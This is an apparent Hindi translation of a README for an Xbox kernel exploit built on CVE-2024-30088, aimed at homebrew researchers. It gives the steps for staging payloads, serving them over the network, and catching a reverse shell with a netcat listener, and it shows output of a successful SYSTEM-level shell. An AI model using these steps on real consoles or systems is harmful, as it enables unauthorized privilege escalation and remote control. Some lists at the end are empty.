
Xbox SystemOS के लिए CVE-2024-30088 का उपयोग करते हुए कर्नेल शोषण
Collateral Damage, Xbox SystemOS के लिए एक कर्नेल एक्सप्लॉइट है जो CVE-2024-30088 का उपयोग करता है। यह कर्नेल संस्करण 25398.4478, 25398.4908, और 25398.4909 चलाने वाले Xbox One और Xbox Series कंसोल को लक्षित करता है। प्रारंभिक प्रवेश बिंदु Game Script UWP एप्लिकेशन के माध्यम से है।
पहले चरण के पेलोड, PE लोडर और नेटवर्क लोडर Solstice द्वारा प्रदान किए गए हैं।
यह एक्सप्लॉइट Emma Kirkpatrick (भेद्यता खोज और शोषण) और Lander Brandt (Solstice) द्वारा विकसित किया गया था।
Xbox कंसोल पर पेलोड को स्थानीय रूप से रखने के लिए Adv File Explorer (FullTrust) जैसे फुल-ट्रस्ट एक्सप्लोरर की सिफारिश की जाती है। वैकल्पिक रूप से, प्रारंभिक पेलोड को USB कीबोर्ड सिम्युलेटर (रबर डकी आदि) के माध्यम से दिया जा सकता है और आगे के पेलोड चरणों को फिर नेटवर्क पर लोड किया जा सकता है।
यहां दिया गया रिवर्स शेल उदाहरण आवश्यक है कि आपका कंसोल नेटवर्क से जुड़ा हो। अपने कंसोल को नेटवर्क से कनेक्ट करते समय इंटरनेट और अपडेट से कनेक्ट होने से बचने के लिए बहुत सावधान रहें। जितना संभव हो Xbox LIVE से कनेक्टिविटी को ब्लॉक करने का प्रयास करें, कम से कम अपने DNS को अमान्य सर्वरों पर सेट करके।
यह एक्सप्लॉइट पूरी तरह से विश्वसनीय नहीं है। यह CPU साइड चैनल के साथ-साथ एक रेस कंडीशन पर निर्भर करता है, दोनों में विफल होने की क्षमता है। विफलता की स्थिति में, एक्सप्लॉइट आपको नेटवर्क आउटपुट के माध्यम से विफलता के बारे में सचेत कर सकता है, या कंसोल स्वयं क्रैश और रीबूट हो सकता है।
gamescript_autosave_network.txt या gamescript_autosave.txt की पंक्ति 7 को संशोधित करें।
gamescript_autosave.txt, stage2.bin, और run.exe को अपने कंसोल पर Game Script एप्लिकेशन की LocalState निर्देशिका में कॉपी करें (Q:\Users\UserMgr0\AppData\Local\Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState\)gamescript_autosave_network.txt की सामग्री को GameScript विंडो में टाइप करें। payload_server_win_x64.exe --stage2 stage2.bin --run run.exe के माध्यम से stage2.bin और run.exe को सर्व करें।nc64.exe -lvnp 7070)listening on [any] 7070 ...
connect to [192.168.0.61] from (UNKNOWN) [192.168.0.130] 49665
Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)
Build number: 25398.4478
Attempting to find kernel base...
Found likely kernel base: FFFFF80AF9800000
Attempting exploit...
Exploit succeeded! Running payload!
Microsoft Windows [Version 10.0.25398.4478]
Copyright (c) Microsoft Corporation. All rights reserved.
S:\>
इसे Xbox पर होमब्रू लोड करने के लिए एक उपयोगकर्ता-अनुकूल टूल बनाने के लिए बहुत अधिक अतिरिक्त कार्य की आवश्यकता है, लेकिन मुझे आशा है कि यह एक अच्छा प्रारंभिक बिंदु प्रदान करता है :) यदि आप SYSTEM के रूप में कोड चलाने के साथ प्रयोग करना चाहते हैं तो आप अपना कोड post_exploit.c में post_exploit फंक्शन में रख सकते हैं।
इस पर और भी बहुत कुछ करना बाकी है, लेकिन जैसे-जैसे कर्नेल भाग पूरा हो गया है, मैं इसे समुदाय के साथ साझा करना चाहता था ताकि डेवलपर्स SYSTEM विशेषाधिकारों के साथ खोजबीन शुरू कर सकें। यहां कुछ चीजें हैं जिन्हें मैं भविष्य में जोड़ने की उम्मीद कर रहा हूं:
अतिरिक्त विचारों का स्वागत है :)
उन सभी को धन्यवाद जिन्होंने मुझे विचार-मंथन में मदद की और इस दौरान अपना ज्ञान और समय मेरे साथ साझा किया!!! कुछ लोग जिनकी मैं सराहना करना चाहूंगा: